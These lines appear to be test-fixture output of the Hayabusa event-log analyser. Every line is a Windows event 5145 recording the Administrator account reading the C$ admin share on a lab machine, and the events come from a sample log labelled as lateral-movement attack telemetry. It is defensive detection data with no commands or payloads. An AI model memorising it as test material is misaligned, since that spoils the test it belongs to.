+2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.787 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.787 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.787 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.797 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.797 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.797 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\.ssh | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.827 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.827 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.827 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\AppData | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\AppData\Roaming | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\AppData\Roaming\Microsoft | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows\Start Menu | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows\Start Menu\Programs | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\New folder | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\plugins | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\RDPWrap-v1.6.2 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.857 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.857 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\translations | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.867 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x32 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.867 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x32\db | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.867 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x32\garbage | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x32\memdumps | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x32\platforms | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x32\plugins | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x64 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x64\db | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x64\memdumps | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x64\platforms | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x64\plugins | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\winrar-cve | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
